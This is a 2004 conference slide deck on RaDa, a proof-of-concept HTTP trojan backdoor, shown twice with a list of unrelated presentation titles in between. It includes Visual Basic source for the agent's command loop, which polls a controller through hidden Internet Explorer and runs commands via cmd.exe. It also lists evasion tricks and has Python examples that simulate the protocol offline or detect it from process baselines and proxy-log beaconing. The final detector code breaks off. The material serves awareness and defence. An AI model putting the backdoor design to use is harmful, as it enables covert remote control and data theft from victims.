RaDa: a “new” trojan backdoor

  Jorge Ortiz & Raúl Siles
  jorge.ortiz@hp.com           raul.siles@hp.com


        FIST Conference, Madrid, October 2004


          RaDa: a “new” trojan backdoor            1
Agenda

• Introduction
• Healthy Environment
• Remote Control (RaDa Demo)
• One step beyond
• Getting it in
• Countermeasures

Intro

• Awareness on trojans for remote control
  & protection measures.
• Most concepts are based on Setiri
  (R. Temmingh & H. Meer, Black Hat 2002)
• Implemented by Raul Siles, David Perez
  & Jorge Ortiz
• Used as the Honeynet Project Scan of the
  Month (SOTM) in September 2004
  (thanks Lance and Ed!)

A healthy environment

• You have done a pretty good job:
  – Policy & procedures
  – Firewall (ingress and egress filters)
  – IDS
  – Secure configurations
  – AV and Personal Firewalls
• But problems appear…

A healthy environment

[Network diagram: Internet -> Router -> Firewall -> Proxy -> Secure system,
 with an IDS on the internal network]

Remote Control

• Assume for a minute that the intruder has
  already managed to install a program on
  the secure system.
• How it got there is covered later
  (see "Getting it in").




Remote Control: implementation

• RaDa:
  – Very easy to do
  – A lot of cut-and-paste code (Google
    knows how to do it!)
  – Visual Basic, Perl…
  – Uses the system's own Internet Explorer
    (driven as a COM automation object)
  – HTTP communications, so its traffic leaves
    the network like any browser session
RaDa: implementation

Sub RaDa_Run()
    ' sServerURL and sCommandsFile are module-level settings:
    ' the controller's base URL and the name of the commands page

    ' Load the commands page through an invisible Internet Explorer
    Set oExplorer = CreateObject("InternetExplorer.Application")
    oExplorer.Visible = 0
    sCommandsURL = sServerURL & "/" & sCommandsFile
    oExplorer.Navigate sCommandsURL
    ' Wait until the page has finished loading before touching the DOM
    Do While oExplorer.Busy Or oExplorer.ReadyState <> 4
        DoEvents
    Loop

    ' Loop through the commands
    ' (input fields of the first form in the page)
    For Each Element In oExplorer.Document.Forms(0).Elements
        Select Case Element.Name
            Case "exe"
                vRetValue = CommandExe(Element.Value)
            Case "get"
                vRetValue = CommandGet(Element.Value)
            Case "put"
                vRetValue = CommandPut(Element.Value)
            Case Else
                ' Ignore unknown command
        End Select
    Next Element

    ' Close Internet Explorer and release the object variable "oExplorer"
    oExplorer.Application.Quit
    Set oExplorer = Nothing
End Sub

RaDa: How It Works

[Diagram: Intruder <-> Controller (a web server) <-> RaDa, over HTTP/HTTPS]

1. Intruder publishes an order on the Controller
2. RaDa opens an invisible IE instance
3. IE sends a GET to the Controller
4. Controller sends the command page back to RaDa
5. RaDa executes the command and sends the
   response back with a POST
6. Intruder retrieves the results from the Controller

RaDa: Command Exec (demo)

1. RaDa/IE retrieves the command from the
   Controller with a GET
2. Parse the page for
   <input type="text" name="exe" value="…">
3. Execute the command with cmd.exe

RaDa: File Download (demo)

1. RaDa/IE retrieves the command from the
   Controller with a GET
2. Parse the page for
   <input type="text" name="get" value="…">
3. Download the file from the Controller
   with a POST
4. UUdecode it and save it

RaDa: Screen Capture (demo)

1. RaDa/IE retrieves the command from the
   Controller with a GET
2. Parse the page for
   <input type="text" name="screenshot" value="…">
3. Capture the screen to a file with the
   selected name

RaDa: File Upload (demo)

1. RaDa/IE retrieves the command from the
   Controller with a GET
2. Parse the page for
   <input type="text" name="put" value="…">
3. Send the file contents back with a POST
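The command cycle of the "How It Works" slide and the four demo slides above, as an added example that is not RaDa's own code: a Python stand-in for the agent side that reads the orders from the first form of a controller page and dispatches on each input's name, the way RaDa_Run iterates Forms(0).Elements. The controller page, the file the controller serves and the decoy second form are constructed here; the exe order is only recorded, never run, and the get order is pulled from an in-memory dictionary instead of the POST RaDa uses, then uudecoded as the File Download slide describes.

```python
"""Added example, not RaDa's own code: how a RaDa-style agent reads its
orders from the controller page and what each order type does.

Assumptions (none of these values come from the slides): the controller
page, the file served by the controller and the result labels are
constructed here.  Commands are recorded, never executed.
"""
import binascii
from html.parser import HTMLParser

# Constructed controller page.  Orders are <input> fields of the FIRST form;
# the second form is a decoy that a faithful agent must ignore.
SAMPLE_PAGE = """<html><body>
<form name="orders">
  <input type="text" name="exe" value="ipconfig /all">
  <input type="text" name="get" value="tool.exe">
  <input type="text" name="screenshot" value="desk1.bmp">
  <input type="text" name="bogus" value="ignored">
</form>
<form name="decoy"><input type="text" name="exe" value="format c:"></form>
</body></html>"""

# Constructed "file on the controller" that a get order fetches.
CONTROLLER_FILES = {"tool.exe": b"MZ\x90\x00" + bytes(range(256)) * 2}


class FirstFormInputs(HTMLParser):
    """Collect (name, value) of <input> elements inside the first <form> only,
    mirroring oExplorer.Document.Forms(0).Elements in RaDa_Run."""

    def __init__(self):
        super().__init__()
        self.depth = 0        # > 0 while inside the first <form>
        self.done = False     # True once the first <form> has closed
        self.inputs = []

    def handle_starttag(self, tag, attrs):
        if self.done:
            return
        if tag == "form":
            self.depth += 1
        elif tag == "input" and self.depth > 0:
            a = dict(attrs)
            self.inputs.append((a.get("name", ""), a.get("value", "")))

    def handle_endtag(self, tag):
        if tag == "form" and self.depth > 0:
            self.depth -= 1
            if self.depth == 0:
                self.done = True


def parse_orders(html):
    """Return the (name, value) pairs the agent loop iterates over."""
    p = FirstFormInputs()
    p.feed(html)
    p.close()
    return p.inputs


def uuencode(data):
    """uuencode bytes as the controller would serve a file (45 bytes per line)."""
    lines = [binascii.b2a_uu(data[i:i + 45]).decode("ascii")
             for i in range(0, len(data), 45)]
    return "begin 644 file\n" + "".join(lines) + "`\nend\n"


def uudecode(text):
    """Decode a uuencoded body; begin/end framing and the '`' terminator are optional."""
    out = bytearray()
    for line in text.splitlines():
        if not line or line.startswith("begin ") or line in ("end", "`"):
            continue
        out += binascii.a2b_uu(line)
    return bytes(out)


def fetch_from_controller(filename):
    """Stand-in for the POST RaDa uses to pull a file; uuencoded text or None."""
    data = CONTROLLER_FILES.get(filename)
    return None if data is None else uuencode(data)


def dispatch(orders):
    """Simulate the agent loop: record what each order would do, never run it."""
    actions = []
    for name, value in orders:
        if name == "exe":
            actions.append(("exec-via-cmd.exe", value))
        elif name == "get":
            body = fetch_from_controller(value)
            if body is None:
                actions.append(("download-failed", value))
            else:
                actions.append(("save-file", value, uudecode(body)))
        elif name == "put":
            actions.append(("upload-via-POST", value))
        elif name == "screenshot":
            actions.append(("capture-screen", value))
        # anything else is ignored, like Case Else in RaDa_Run
    return actions


if __name__ == "__main__":
    for action in dispatch(parse_orders(SAMPLE_PAGE)):
        print(action[0], action[1], "(%d bytes)" % len(action[2]) if len(action) > 2 else "")
```

The decoy form is the edge case worth keeping in mind when writing a detector or a fake controller for analysis: only the first form counts, so a page that shows harmless fields first and the real order in a later form would never reach this agent, and vice versa.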

RaDa: hiding techniques (demo)

• No window, so nothing shows in Task Manager's
  Applications tab
• Innocuous process name
• Packed executable
• HTTP through IE, commands and results carried
  in ordinary HTML forms
• Misleading information planted for the analyst
• VMware detection (to frustrate analysis inside
  a virtual machine)
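One way to turn the "Baselines (processes, memory…)" countermeasure from the Countermeasures slide against the first three hiding techniques, as an added example that is not code from the slides: diff a process snapshot against a known-good baseline of (name, image path, hash), and test an image's bytes for the near-uniform distribution a packer leaves behind. The baseline, the snapshot, the image bytes and the 7.2 bits/byte threshold are constructed or assumed; a real baseline would be taken on a freshly built host.

```python
"""Added example, not from the RaDa slides: two baseline checks that catch an
agent hiding behind an innocuous process name and a packed image.

Check 1 diffs the running processes against a known-good baseline of
(name, image path, SHA-256).  Check 2 measures the Shannon entropy of an
image; packed or encrypted executables sit near 8 bits/byte, ordinary code
and data well below.  Everything below is constructed or assumed.
"""
import hashlib
import math
from collections import Counter, defaultdict

PACKED_THRESHOLD = 7.2   # bits per byte; assumed cut-off, tune per environment


def sha256_hex(data):
    return hashlib.sha256(data).hexdigest()


# Constructed sample images: an ordinary-looking one (mostly zeros and text)
# and a "packed" one whose bytes are spread evenly over all 256 values.
NORMAL_IMAGE = b"MZ\x90\x00" + b"\x00" * 200 + b"This program cannot be run in DOS mode." * 4
PACKED_IMAGE = b"MZ\x90\x00" + bytes(range(256)) * 16

# Known-good baseline captured on a clean build (constructed):
# entries are (process name, image path, sha256 of the image).
BASELINE = {
    ("explorer.exe", r"C:\Windows\explorer.exe", sha256_hex(NORMAL_IMAGE + b"e")),
    ("svchost.exe", r"C:\Windows\System32\svchost.exe", sha256_hex(NORMAL_IMAGE + b"s")),
}

# Snapshot taken later (constructed): the real svchost.exe is still there,
# a second "svchost.exe" runs out of a temp directory with a packed image,
# and a new process with a plausible name has appeared.
CURRENT = {
    ("explorer.exe", r"C:\Windows\explorer.exe", sha256_hex(NORMAL_IMAGE + b"e")),
    ("svchost.exe", r"C:\Windows\System32\svchost.exe", sha256_hex(NORMAL_IMAGE + b"s")),
    ("svchost.exe", r"C:\Windows\Temp\svchost.exe", sha256_hex(PACKED_IMAGE)),
    ("winupdate.exe", r"C:\Windows\Temp\winupdate.exe", sha256_hex(PACKED_IMAGE)),
}


def diff_processes(baseline, current):
    """Return findings as (kind, name, path) tuples, sorted by process.

    A name never seen before is 'new-process'; a known name running from a
    path the baseline never had is 'same-name-different-path' (masquerading);
    a known name and path whose image hash changed is 'image-changed'.
    """
    by_name = defaultdict(set)
    for name, path, digest in baseline:
        by_name[name.lower()].add((path.lower(), digest))
    findings = []
    for name, path, digest in sorted(current):
        known = by_name.get(name.lower())
        if not known:
            findings.append(("new-process", name, path))
        elif (path.lower(), digest) in known:
            continue
        elif path.lower() in {p for p, _ in known}:
            findings.append(("image-changed", name, path))
        else:
            findings.append(("same-name-different-path", name, path))
    return findings


def shannon_entropy(data):
    """Bits per byte of the byte distribution in data (0.0 for empty input)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def looks_packed(image_bytes, threshold=PACKED_THRESHOLD):
    """True when the image's byte entropy is at or above the packing threshold."""
    return shannon_entropy(image_bytes) >= threshold


if __name__ == "__main__":
    for finding in diff_processes(BASELINE, CURRENT):
        print(*finding)
    print("packed:", looks_packed(PACKED_IMAGE), "normal:", looks_packed(NORMAL_IMAGE))
```

Entropy alone is a weak signal (compressed resources and legitimately packed installers score high too); it is the combination with the baseline diff, a known name from an unexpected path, that makes the finding worth an analyst's time.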

One Step Beyond

• Strong authentication of commands
  (GPG signatures)
• Blog/wiki as the controller
• Multi-agent management console
• Other channels (mail, DNS, ping/ICMP,
  FTP)

Getting it in

• Zero-day exploit
• Ask the user for help:
  – Mail attachment
  – Download
  – Social engineering
• Insider

Countermeasures

• User awareness
• Baselines (processes, memory…)
• Restrict web access (filter outbound
  HTTP destinations at the proxy)
• Update AV signatures frequently
• Signed executables
• Behavioral vs. signature analysis
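RaDa's traffic looks like browsing by signature but not by rhythm: one fixed URL polled at a fixed interval, each GET followed by a POST to the same host. The following is an added example (not from the slides) of the behavioral check the last bullet argues for, run over constructed proxy log lines in an assumed format (epoch seconds, client IP, method, URL); the controller address 192.0.2.10, the paths and the 0.2 regularity threshold are made up for the example.

```python
"""Added example, not from the slides: spot RaDa-style beaconing in web proxy
logs by rhythm rather than signature.  The log format (epoch seconds,
client, method, URL) and every line below are constructed; 192.0.2.10 is a
documentation address standing in for the controller.
"""
import statistics
from collections import defaultdict
from urllib.parse import urlsplit

SAMPLE_LOG = """\
1096300000 10.0.0.5 GET http://192.0.2.10/orders.html
1096300002 10.0.0.5 POST http://192.0.2.10/results.php
1096300060 10.0.0.5 GET http://192.0.2.10/orders.html
1096300062 10.0.0.5 POST http://192.0.2.10/results.php
1096300119 10.0.0.5 GET http://192.0.2.10/orders.html
1096300121 10.0.0.5 POST http://192.0.2.10/results.php
1096300181 10.0.0.5 GET http://192.0.2.10/orders.html
1096300183 10.0.0.5 POST http://192.0.2.10/results.php
1096300240 10.0.0.5 GET http://192.0.2.10/orders.html
1096300242 10.0.0.5 POST http://192.0.2.10/results.php
1096300005 10.0.0.7 GET http://www.example.com/
1096300007 10.0.0.7 GET http://www.example.com/style.css
1096300130 10.0.0.7 GET http://www.example.org/news
1096300131 10.0.0.7 GET http://www.example.org/img/logo.png
1096300400 10.0.0.7 GET http://www.example.com/
1096300900 10.0.0.7 GET http://www.example.com/
1096301100 10.0.0.7 GET http://www.example.com/
"""


def parse_log(text):
    """Yield (ts, client, method, url) from the constructed log format."""
    for line in text.splitlines():
        if line.strip():
            ts, client, method, url = line.split()
            yield int(ts), client, method.upper(), url


def detect_beacons(text, min_polls=4, max_cv=0.2):
    """Flag (client, url) pairs polled at least min_polls times at a steady period.

    Regularity is the coefficient of variation (population stdev / mean) of
    the gaps between successive GETs; max_cv=0.2 is an assumed threshold.
    POSTs from the same client to the same host are counted as the likely
    result channel.
    """
    gets = defaultdict(list)
    posts = defaultdict(int)
    for ts, client, method, url in parse_log(text):
        host = urlsplit(url).netloc
        if method == "GET":
            gets[(client, url)].append(ts)
        elif method == "POST":
            posts[(client, host)] += 1

    findings = []
    for (client, url), times in sorted(gets.items()):
        if len(times) < min_polls:
            continue
        times.sort()
        gaps = [b - a for a, b in zip(times, times[1:])]
        period = statistics.mean(gaps)
        if period <= 0:
            continue
        cv = statistics.pstdev(gaps) / period
        if cv <= max_cv:
            findings.append({
                "client": client,
                "url": url,
                "polls": len(times),
                "period_s": round(period, 1),
                "cv": round(cv, 3),
                "posts": posts.get((client, urlsplit(url).netloc), 0),
            })
    return findings


if __name__ == "__main__":
    for f in detect_beacons(SAMPLE_LOG):
        print("beacon? %(client)s -> %(url)s every %(period_s)ss "
              "(%(polls)d polls, cv %(cv)s, %(posts)d POSTs to host)" % f)
```

The interesting host 10.0.0.7 revisits www.example.com/ four times as well, but its gaps vary by a third of the mean and it never POSTs, so it stays below the threshold; raising max_cv to 0.5 would flag it too, which is the trade-off any rhythm-based rule has to be tuned for.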

Scan of the Month

• Goal:
  – Improve the state of the art in reverse
    engineering Windows malware
• Honeynet Project:
  – http://www.honeynet.org/scans/



That’s all folks

• Thank you!
• Any questions?




       FIST Conference, Madrid, October 2004

Attribution-NonCommercial-NoDerivs 2.0
You are free:
to copy, distribute, display, and perform the work
Under the following conditions:


  Attribution. You must give the original author credit.

  Noncommercial. You may not use this work for commercial purposes.

  No Derivative Works. You may not alter, transform, or build upon this work.

For any reuse or distribution, you must make clear to others the license terms of this work.
Any of these conditions can be waived if you get permission from the author.
Your fair use and other rights are in no way affected by the above.
This is a human-readable summary of http://creativecommons.org/licenses/by-nc-nd/2.0/.


 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLScyllaDB
 
Moving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfMoving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfLoriGlavin3
 
Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfAddepto
 
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024BookNet Canada
 
The Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsThe Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsPixlogix Infotech
 
Digital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptxDigital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptxLoriGlavin3
 

Último (20)

Unraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfUnraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdf
 
How to write a Business Continuity Plan
How to write a Business Continuity PlanHow to write a Business Continuity Plan
How to write a Business Continuity Plan
 
TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024
 
DSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningDSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine Tuning
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?
 
DevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenDevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache Maven
 
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptxThe Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
 
"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio Web
 
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
 
Generative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information DevelopersGenerative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information Developers
 
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxMerck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
 
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxA Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQL
 
Moving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfMoving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdf
 
DMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special EditionDMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special Edition
 
Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdf
 
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
 
The Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsThe Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and Cons
 
Digital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptxDigital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptx
 

Malware RADA

8. RaDa: implementation

  Sub RaDa_Run()
    ' sServerURL and sCommandsFile are module-level variables set
    ' elsewhere in RaDa (not shown on the slide)
    ' Load commands file
    Set oExplorer = CreateObject("InternetExplorer.Application")
    oExplorer.Visible = 0
    sCommandsURL = sServerURL & "/" & sCommandsFile
    oExplorer.Navigate sCommandsURL
    ' Wait until the page has loaded before touching Document
    ' (this loop is not on the slide excerpt; without it Forms(0)
    ' is not yet available after Navigate returns)
    Do While oExplorer.Busy Or oExplorer.ReadyState <> 4
      DoEvents
    Loop

    ' Loop through the commands
    ' (Input fields in the first Form)
    For Each Element In oExplorer.Document.Forms(0).Elements
      Select Case Element.Name
        Case "exe"
          vRetValue = CommandExe(Element.Value)
        Case "get"
          vRetValue = CommandGet(Element.Value)
        Case "put"
          vRetValue = CommandPut(Element.Value)
        Case Else
          ' Ignore unknown command
      End Select
    Next Element

    ' Close Internet Explorer and release the object variable "oExplorer"
    oExplorer.Application.Quit
    Set oExplorer = Nothing
  End Sub
9. RaDa: How It Works
  (Diagram: Intruder, Controller and RaDa, talking over HTTP/HTTPS)
  1. Intruder publishes order
  2. RaDa opens invisible IE
  3. IE sends GET to Ctrler (the controller)
  4. Ctrler sends command back to RaDa
  5. RaDa execs command & sends response with POST
  6. Intruder retrieves results from Ctrler

10. Demo RaDa: Command Exec
  (Diagram: Intruder, Controller, RaDa)
  1. RaDa/IE retrieves command from Ctrler with GET
  2. Parse page: <input type="text" name="exe" value="…">
  3. Exec command with Cmd.exe

11. Demo RaDa: File Download
  (Diagram: Intruder, Controller, RaDa)
  1. RaDa/IE retrieves command from Ctrler with GET
  2. Parse page: <input type="text" name="get" value="…">
  3. Download file from Ctrler with POST
  4. UUdecode and save it

12. Demo RaDa: Screen Capture
  (Diagram: Intruder, Controller, RaDa)
  1. RaDa/IE retrieves command from Ctrler with GET
  2. Parse page: <input type="text" name="screenshot" value="…">
  3. Capture screen with selected name

13. Demo RaDa: File Upload
  (Diagram: Intruder, Controller, RaDa)
  1. RaDa/IE retrieves command from Ctrler with GET
  2. Parse page: <input type="text" name="put" value="…">
  3. Send back contents with POST
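The command protocol of slides 8 to 13, written out as an added example in Python. This is not RaDa's code (RaDa is Visual Basic driving Internet Explorer); it is an offline model of both sides of the exchange: a simulated controller that publishes the commands page and answers the agent's POSTs, and an agent loop that parses the first form's input fields and dispatches on "exe", "get", "put" and "screenshot", ignoring anything else, as the VB "Case Else" does. The controller paths "/download", "/upload" and "/results", the file names and the page contents are assumptions of this example; the slides only say commands travel as input fields over HTTP and downloads are uuencoded. Nothing is executed or written to disk: "exe" only records the command line cmd.exe would have received.

```python
import binascii
import html
from html.parser import HTMLParser


class FirstFormInputs(HTMLParser):
    """Collect (name, value) of every <input> inside the first <form>, in
    document order: the stand-in for RaDa's loop over
    oExplorer.Document.Forms(0).Elements."""

    def __init__(self):
        super().__init__()
        self.in_form = False
        self.seen_form = False
        self.inputs = []

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form" and not self.seen_form:
            self.in_form = self.seen_form = True
        elif tag == "input" and self.in_form:
            # HTMLParser already unescapes &quot; &lt; ... in attribute values
            self.inputs.append((attrs.get("name", ""), attrs.get("value", "")))

    def handle_endtag(self, tag):
        if tag == "form":
            self.in_form = False


def uuencode(data: bytes) -> str:
    """uuencode body without begin/end framing: 45-byte chunks, one line each."""
    return "".join(binascii.b2a_uu(data[i:i + 45]).decode("ascii")
                   for i in range(0, len(data), 45))


def uudecode(text: str) -> bytes:
    return b"".join(binascii.a2b_uu(line) for line in text.splitlines() if line)


class Controller:
    """Simulated intruder controller (assumed interface: the slides only say it
    is a web server reached over HTTP). It publishes one commands page and
    answers the agent's POSTs in memory, so the example runs offline."""

    def __init__(self, commands, files=None):
        self.commands = commands      # [(field name, value)] to publish
        self.files = files or {}      # files the agent may "get"
        self.uploads = {}             # files the agent "put"
        self.results = []             # output posted back by "exe"

    def get_commands_page(self) -> str:
        fields = "".join(
            '<input type="text" name="%s" value="%s">'
            % (html.escape(n, quote=True), html.escape(v, quote=True))
            for n, v in self.commands)
        return ('<html><body><form method="post" action="/results">%s'
                '</form></body></html>' % fields)

    def post(self, path: str, body: str) -> str:
        if path == "/download":                 # slide 11, step 3
            return uuencode(self.files[body])
        if path == "/upload":                   # slide 13, step 3
            name, _, payload = body.partition("\n")
            self.uploads[name] = uudecode(payload)
        elif path == "/results":                # slide 9, step 5
            self.results.append(body)
        return ""


def rada_run(ctrl: Controller, local_files: dict) -> list:
    """Agent side of slide 8: GET the commands page, walk the first form's
    inputs and dispatch on the field name. Nothing is executed or written;
    'exe' only records the command line cmd.exe would have been handed."""
    parser = FirstFormInputs()
    parser.feed(ctrl.get_commands_page())
    done = []
    for name, value in parser.inputs:
        if name == "exe":
            output = "<simulated cmd.exe /c %s>" % value
            ctrl.post("/results", output)
            done.append(("exe", value, output))
        elif name == "get":
            data = uudecode(ctrl.post("/download", value))
            local_files[value] = data
            done.append(("get", value, data))
        elif name == "put":
            ctrl.post("/upload", value + "\n" + uuencode(local_files[value]))
            done.append(("put", value, len(local_files[value])))
        elif name == "screenshot":
            done.append(("screenshot", value, None))   # slide 12; not simulated
        # any other field name is ignored, like the VB "Case Else"
    return done


def demo():
    """Constructed sample session: one page carrying four fields, one unknown."""
    ctrl = Controller(
        commands=[("exe", "ipconfig /all"), ("get", "tool.exe"),
                  ("put", "secrets.txt"), ("bogus", "ignored")],
        files={"tool.exe": bytes(range(256)) * 2})
    local = {"secrets.txt": b"constructed sample document\n"}
    return ctrl, local, rada_run(ctrl, local)


if __name__ == "__main__":
    ctrl, local, done = demo()
    for entry in done:
        print(entry[0], entry[1])
```

The point worth noticing is how little the agent needs: an HTML parser (RaDa gets one for free from the IE DOM), uuencode/uudecode, and an outbound HTTP client. Every request is a plain GET or POST to a web page, which is exactly what an egress filter and a proxy are configured to allow.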
14. Demo RaDa: hiding techniques
  • No application in Task Manager
  • Process name
  • Packed
  • HTTP through IE using HTML
  • Misleading info
  • VMWare detection

15. One Step Beyond
  • Strong authentication of commands (GPG)
  • Blog/Wiki
  • Multiagent management Console
  • Other channels (mail, dns, ping, ftp)

16. Getting it in
  • Zero day exploit
  • Ask for help:
    – Mail attachment
    – Download
    – Social engineering
  • Insider

17. Countermeasures
  • User awareness
  • Baselines (processes, memory…)
  • Restrict web access
  • Update AV signatures frequently
  • Signed Executables
  • Behavioral vs. Signature analysis
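An added example of the behavioral analysis the countermeasures slide prefers over signatures; it is not from the presentation or from the RaDa authors. The agent loop of slide 9 (invisible IE, GET to the controller, POST with the results, repeat) produces a stream of requests that each look like ordinary browsing but that together are periodic, low-jitter, and aimed at a single URL from a single client. The code below parses Squid native-format proxy log lines, groups GETs by (client, host, path), computes the coefficient of variation of the gaps between them, and flags groups that are both frequent enough and too regular, also counting POSTs to the same host. The log lines, addresses, URL and thresholds (5 requests, CV at most 0.2) are constructed for this example.

```python
import re
import statistics
from collections import defaultdict

# Squid native access.log: time elapsed client code/status bytes method URL ...
SQUID_LINE = re.compile(
    r"^(?P<ts>\d+\.\d+)\s+\d+\s+(?P<client>\S+)\s+\S+\s+\d+\s+"
    r"(?P<method>\S+)\s+(?P<url>\S+)")

# Constructed sample: 10.1.1.20 polls one page roughly every minute and
# posts results twice; 10.1.1.21 is a person reading the news.
SAMPLE_LOG = """\
1096300000.101     45 10.1.1.20 TCP_MISS/200 812 GET http://203.0.113.10/commands.html - DIRECT/203.0.113.10 text/html
1096300000.402     60 10.1.1.20 TCP_MISS/200 210 POST http://203.0.113.10/results - DIRECT/203.0.113.10 text/html
1096300005.000    120 10.1.1.21 TCP_MISS/200 5120 GET http://news.example.net/ - DIRECT/198.51.100.7 text/html
1096300012.000     90 10.1.1.21 TCP_MISS/200 3310 GET http://news.example.net/ - DIRECT/198.51.100.7 text/html
1096300061.110     44 10.1.1.20 TCP_MISS/200 812 GET http://203.0.113.10/commands.html - DIRECT/203.0.113.10 text/html
1096300119.098     47 10.1.1.20 TCP_MISS/200 812 GET http://203.0.113.10/commands.html - DIRECT/203.0.113.10 text/html
1096300140.000     80 10.1.1.21 TCP_MISS/200 3400 GET http://news.example.net/ - DIRECT/198.51.100.7 text/html
1096300180.120     46 10.1.1.20 TCP_MISS/200 812 GET http://203.0.113.10/commands.html - DIRECT/203.0.113.10 text/html
1096300241.130     45 10.1.1.20 TCP_MISS/200 812 GET http://203.0.113.10/commands.html - DIRECT/203.0.113.10 text/html
1096300241.500     58 10.1.1.20 TCP_MISS/200 210 POST http://203.0.113.10/results - DIRECT/203.0.113.10 text/html
1096300299.090     45 10.1.1.20 TCP_MISS/200 812 GET http://203.0.113.10/commands.html - DIRECT/203.0.113.10 text/html
1096300900.000    100 10.1.1.21 TCP_MISS/200 3500 GET http://news.example.net/ - DIRECT/198.51.100.7 text/html
"""


def parse(log_text: str) -> list:
    """Return (timestamp, client, method, host, path) per parsable line."""
    events = []
    for line in log_text.splitlines():
        m = SQUID_LINE.match(line)
        if not m:
            continue
        host, _, path = re.sub(r"^https?://", "", m["url"]).partition("/")
        events.append((float(m["ts"]), m["client"], m["method"], host, "/" + path))
    return events


def find_beacons(events: list, min_requests: int = 5, max_cv: float = 0.2) -> list:
    """Flag (client, host, path) groups whose GET gaps are too regular.
    CV = stddev / mean of the inter-request gaps; a human browsing the same
    page has a CV well above 1, a polling loop sits close to 0."""
    gets = defaultdict(list)
    posts = defaultdict(int)
    for ts, client, method, host, path in events:
        if method == "GET":
            gets[(client, host, path)].append(ts)
        elif method == "POST":
            posts[(client, host)] += 1

    findings = []
    for (client, host, path), stamps in gets.items():
        if len(stamps) < min_requests:
            continue
        stamps.sort()
        gaps = [b - a for a, b in zip(stamps, stamps[1:])]
        mean = statistics.mean(gaps)
        cv = statistics.pstdev(gaps) / mean if mean > 0 else float("inf")
        if cv <= max_cv:
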